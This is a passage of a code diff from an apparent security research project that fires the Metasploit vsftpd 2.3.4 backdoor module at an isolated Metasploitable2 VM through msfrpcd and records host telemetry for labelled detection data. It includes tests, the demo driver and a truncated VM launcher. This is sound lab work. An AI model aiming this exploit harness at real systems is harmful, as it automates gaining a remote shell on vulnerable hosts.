test_arm_is_idempotent() -> None: + driver, client, events = _make_driver( + sessions_after_fire={1: {"type": "shell"}}, + ) + driver.setup() + driver.set_phase("armed") + driver.set_phase("armed") + fire_calls = [c for c in client.calls if c[0] == "module_execute"] + assert len(fire_calls) == 1 + + +def test_teardown_kills_session_and_logs_out() -> None: + driver, client, events = _make_driver( + sessions_after_fire={1: {"type": "shell"}}, + ) + driver.setup() + driver.set_phase("armed") + driver.set_phase("infecting") + driver.teardown() + assert any(c[0] == "session_stop" for c in client.calls) + assert client.logged_in is False + assert any(e[0] == "session_killed" for e in events) + + +# ----------------------------------------------------------------------- +# Driver wired into a real EpisodeRunner — events land in events.jsonl +# ----------------------------------------------------------------------- + +def test_driver_events_persist_to_events_jsonl(tmp_path: Path) -> None: + """When the driver is connected to a real EpisodeRunner, the + events it emits must show up in the episode's events.jsonl with + monotonic-clock timestamps (so labels and exploit events can be + correlated downstream).""" + import os + + from orchestrator.episode import EpisodeConfig, EpisodeRunner + + cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml") + client = FakeMSFRpcClient( + sessions_after_fire={1: {"type": "shell", "tunnel_peer": "x:21"}}, + ) + + schedule = [ + ("clean", 0.05), + ("armed", 0.05), + ("infecting", 0.05), + ("infected_running", 0.05), + ("dormant", 0.05), + ("clean", 0.05), + ] + ec = EpisodeConfig( + target_pid=os.getpid(), + duration_s=sum(d for _, d in schedule), + interval_ms=20, + data_root=tmp_path, + phase_schedule=schedule, + ) + runner = EpisodeRunner(ec) + driver = MSFExploitDriver( + client=client, # type: ignore[arg-type] + module=cfg, + cfg=DriverConfig(target_ip="10.200.0.10", session_open_timeout_s=0.5), + emit_event=runner.emit_event, + ) + runner.on_phase = driver.set_phase + driver.setup() + try: + result = runner.run() + finally: + driver.teardown() + + events = [ + json.loads(l) + for l in (result.episode_dir / "events.jsonl").read_text().splitlines() + ] + names = [e["event"] for e in events] + assert "snapshot_load" in names + assert "driver_setup" in names + assert "exploit_fire" in names + assert "session_open" in names + assert "sample_executed" in names + assert "session_dormant" in names + assert "episode_end" in names + + # Driver events must carry monotonic timestamps in episode-relative + # order (snapshot_load is essentially at origin, exploit_fire later, + # session_open later still, episode_end last). + by_name = {e["event"]: e for e in events} + assert by_name["snapshot_load"]["t_mono_ns"] < 1_000_000 # <1ms after origin + assert by_name["exploit_fire"]["t_mono_ns"] > by_name["snapshot_load"]["t_mono_ns"] + assert by_name["session_open"]["t_mono_ns"] >= by_name["exploit_fire"]["t_mono_ns"] + assert by_name["episode_end"]["t_mono_ns"] >= by_name["session_open"]["t_mono_ns"] diff --git a/tools/run_tier3_demo.py b/tools/run_tier3_demo.py new file mode 100644 index 0000000..ed5e15c --- /dev/null +++ b/tools/run_tier3_demo.py @@ -0,0 +1,241 @@ +"""Tier-3: real VM, real exploit, honest ``armed -> infecting`` transition. + +Boots the vulnerable target VM, drives an msfrpcd-fired exploit module +against it, and lets the orchestrator's host /proc collector sample +the qemu-system pid throughout. Compared to ``run_real_vm_demo.py``: +the workload that crosses the ``armed -> infecting`` boundary is now +generated by an actual exploit landing a session, not by a script in +the guest. + +Prereqs: + - vm/images/.qcow2 (e.g. Metasploitable2) + - msfrpcd running locally: + msfrpcd -P -U msf -a 127.0.0.1 -p 55553 + - ``msgpack`` python package installed (added to runtime deps) + +Run: + MSFRPC_PASSWORD= uv run python tools/run_tier3_demo.py \\ + --module vsftpd_234_backdoor \\ + --data-root data +""" + +from __future__ import annotations + +import argparse +import logging +import os +import signal +import subprocess +import sys +import time +from pathlib import Path + +# Allow running as a script. +sys.path.insert(0, str(Path(__file__).resolve().parent.parent)) + +from exploits.driver import DriverConfig, MSFExploitDriver # noqa: E402 +from exploits.modules import load_module_config # noqa: E402 +from exploits.msfrpc import MSFRpcClient, MSFRpcConfig # noqa: E402 +from orchestrator.episode import EpisodeConfig, EpisodeRunner # noqa: E402 + + +# Same envelope shape as Tier 2 so plots are comparable. Slightly more +# armed/infecting time because real exploit fire + session establishment +# takes hundreds of ms to a few seconds. +DEFAULT_SCHEDULE = [ + ("clean", 10.0), + ("armed", 3.0), + ("infecting", 5.0), + ("infected_running", 25.0), + ("dormant", 15.0), + ("infected_running", 20.0), + ("dormant", 5.0), + ("clean", 5.0), +] + + +def _wait_for_path(path: Path, timeout_s: float) -> None: + deadline = time.monotonic() + timeout_s + while time.monotonic() < deadline: + if path.exists() and path.read_text().strip(): + return + time.sleep(0.2) + raise TimeoutError(f"{path} never appeared within {timeout_s}s") + + +def _wait_for_tcp(host: str, port: int, timeout_s: float) -> None: + import socket + deadline = time.monotonic() + timeout_s + last_err: Exception | None = None + while time.monotonic() < deadline: + try: + with socket.create_connection((host, port), timeout=1.0): + return + except OSError as e: + last_err = e + time.sleep(1.0) + raise TimeoutError( + f"target service {host}:{port} not reachable within {timeout_s}s " + f"(last: {last_err})" + ) + + +def main() -> int: + parser = argparse.ArgumentParser(prog="run_tier3_demo") + parser.add_argument("--data-root", default="data") + parser.add_argument("--interval-ms", type=int, default=100) + parser.add_argument( + "--module", + default="vsftpd_234_backdoor", + help="Module config name in exploits/modules/.toml", + ) + parser.add_argument( + "--target-ip", + default="127.0.0.1", + help="Address the exploit module sets RHOSTS to. With the SLIRP " + "launcher (default), the guest's vulnerable port is hostfwd'd to " + "loopback; on a host-only bridge, this is the guest's bridge IP.", + ) + parser.add_argument( + "--target-port", + type=int, + default=21, + help="Probe port to wait on before firing the exploit", + ) + parser.add_argument( + "--run-dir", + default="/tmp/cis490-target", + help="QEMU run dir (sockets + pidfile)", + ) + parser.add_argument( + "--msfrpc-host", default=os.environ.get("MSFRPC_HOST", "127.0.0.1"), + ) + parser.add_argument( + "--msfrpc-port", type=int, + default=int(os.environ.get("MSFRPC_PORT", "55553")), + ) + parser.add_argument( + "--msfrpc-user", default=os.environ.get("MSFRPC_USER", "msf"), + ) + parser.add_argument( + "--keep-vm", + action="store_true", + help="leave the VM running after the episode finishes", + ) + parser.add_argument( + "--target-boot-timeout", + type=float, + default=180.0, + help="how long to wait for the guest's vulnerable service to listen", + ) + args = parser.parse_args() + + logging.basicConfig( + level=logging.INFO, + format="%(asctime)s %(levelname)s %(name)s %(message)s", + ) + log = logging.getLogger("cis490.run_tier3_demo") + + msfrpc_password = os.environ.get("MSFRPC_PASSWORD") + if not msfrpc_password: + log.error("MSFRPC_PASSWORD env var must be set") + return 2 + + repo_root = Path(__file__).resolve().parent.parent + launcher = repo_root / "vm" / "launch_target.sh" + modules_dir = repo_root / "exploits" / "modules" + module_path = modules_dir / f"{args.module}.toml" + if not module_path.exists(): + log.error("no module config at %s", module_path) + return 2 + + module = load_module_config(module_path) + log.info("module loaded: %s (%s)", module.name, module.module_path) + + run_dir = Path(args.run_dir) + if run_dir.exists(): + import shutil + shutil.rmtree(run_dir) + run_dir.mkdir(parents=True, exist_ok=True) + pid_file = run_dir / "qemu.pid" + + log.info("booting target VM via %s (RUN_DIR=%s)", launcher, run_dir) + env = os.environ.copy() + env["RUN_DIR"] = str(run_dir) + qemu = subprocess.Popen( + [str(launcher)], + cwd=str(repo_root), + env=env, + stdout=subprocess.DEVNULL, + stderr=subprocess.DEVNULL, + start_new_session=True, + ) + + try: + _wait_for_path(pid_file, timeout_s=15.0) + qemu_pid = int(pid_file.read_text().strip()) + log.info("qemu pid = %d; waiting for service on %s:%d (timeout %.0fs)", + qemu_pid, args.target_ip, args.target_port, + args.target_boot_timeout) + _wait_for_tcp(args.target_ip, args.target_port, args.target_boot_timeout) + log.info("target service is up") + + client = MSFRpcClient( + MSFRpcConfig( + host=args.msfrpc_host, + port=args.msfrpc_port, + user=args.msfrpc_user, + password=msfrpc_password, + ) + ) + + cfg = EpisodeConfig( + target_pid=qemu_pid, + duration_s=sum(d for _, d in DEFAULT_SCHEDULE), + interval_ms=args.interval_ms, + data_root=Path(args.data_root), + phase_schedule=DEFAULT_SCHEDULE, + image_name=module.name + "-target", + snapshot_name="qcow2-snapshot-on", + ) + runner = EpisodeRunner(cfg) + + driver = MSFExploitDriver( + client=client, + module=module, + cfg=DriverConfig(target_ip=args.target_ip), + emit_event=runner.emit_event, + ) + runner.on_phase = driver.set_phase + + driver.setup() + try: + result = runner.run() + finally: + driver.teardown() + + print() + print(f"episode_id = {result.episode_id}") + print(f"path = {result.episode_dir}") + print(f"rows_proc = {result.rows_proc}") + print(f"phases = {result.phases_observed}") + print(f"module = {module.module_path}") + print() + print("To plot:") + print(f" uv run python tools/plot_envelope.py {result.episode_dir}") + return 0 + finally: + if not args.keep_vm: + log.info("shutting down VM (pid=%d)", qemu.pid) + try: + os.killpg(os.getpgid(qemu.pid), signal.SIGTERM) + except ProcessLookupError: + pass + try: + qemu.wait(timeout=5) + except subprocess.TimeoutExpired: + os.killpg(os.getpgid(qemu.pid), signal.SIGKILL) + + +if __name__ == "__main__": + sys.exit(main()) diff --git a/vm/launch_target.sh b/vm/launch_target.sh new file mode 100755 index 0000000..8d3cae3 --- /dev/null +++ b/vm/launch_target.sh @@ -0,0 +1,95 @@ +#!/usr/bin/env bash +# Boot the Tier-3 *target* VM (the intentionally-vulnerable guest the +# exploit fires against). Companion to ``launch_demo.sh``, which boots +# the *idle* Alpine guest used in Tiers 1-2. +# +# Networking note: this launcher uses SLIRP usermode networking with +# ``restrict=on`` plus an explicit ``hostfwd`` for each vulnerable port. +# That gives us: +# - the host can reach the guest's services (for msfrpcd + the +# exploit module to drive ``RHOSTS=127.0.0.1``) +# - the guest cannot reach the host or the internet (no NAT exit) +# +# The host-only ``br-malware`` bridge described in docs/architecture.md +# replaces SLIRP once the bridge-side pcap collector (source 4) lands — +# at which point payloads with ``reverse_tcp`` callbacks become viable +# too. Until then, we restrict module choices to ones that return a +# shell on the same socket they exploit (e.g. vsftpd_234_backdoor). +# +# Run-dir contract (read by run_tier3_demo.py): +# $RUN_DIR/qemu.pid +# $RUN_DIR/qmp.sock +# $RUN_DIR/monitor.sock +# $RUN_DIR/serial.sock + +set -euo pipefail + +REPO_ROOT="$(cd "$(dirname "$0")/.." && pwd)" +IMAGE="${IMAGE:-$REPO_ROOT/vm/images/metasploitable2.qcow2}" +RUN_DIR="${RUN_DIR:-/tmp/cis490-target}" +RAM_MIB="${RAM_MIB:-512}" +# Ports the host should forward to the guest. Comma-separated host:guest pairs. +# Default covers the vsftpd module's RPORT. +TARGET_PORTS="${TARGET_PORTS:-21:21}" +# KVM if the host can take it; otherwise fall back to TCG. Cross-arch +# images (Metasploitable2 is x86-only) on aarch64 hosts will need TCG. +ACCEL="${ACCEL:-}" + +mkdir -p "$RUN_DIR" +QMP_SOCK="$RUN_DIR/qmp.sock" +MON_SOCK="$RUN_DIR/monitor.sock" +PID_FILE="$RUN_DIR/qemu.pid" +SERIAL_SOCK="$RUN_DIR/serial.sock" + +if [[ ! -f "$IMAGE" ]]; then + cat >&2 <